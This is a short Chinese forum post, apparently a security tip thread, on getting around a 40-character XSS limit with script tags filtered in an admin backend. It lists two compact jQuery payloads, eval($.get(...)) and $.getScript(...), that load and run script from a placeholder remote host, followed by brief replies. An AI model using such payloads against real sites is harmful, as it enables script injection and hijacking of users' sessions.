后台灰盒+exp被限制40字符+script等标签被过滤。
很多人祭出0day bypass,没必要。先分析场景。最爽的是我看到场景使用了jquery,在昨天的一个攻击场景下,我推测那后台用jquery是必然的。
于是简短强悍的exp如:
1. eval($.get('//xxxx.com'))
2. $.getScript('//xxx.com') // 这个最牛逼,我当时没意识到,pw实战发现
思想是:攻击得原生态,依赖场景,这个思想在我们那本《Web前端黑客技术揭秘》第七章有鲜活说法。
大家举一反三吧。
……这个本质就是把createElement / appendChild 包装了一下,节省EXP长度嘛
你真聪明
test
test
test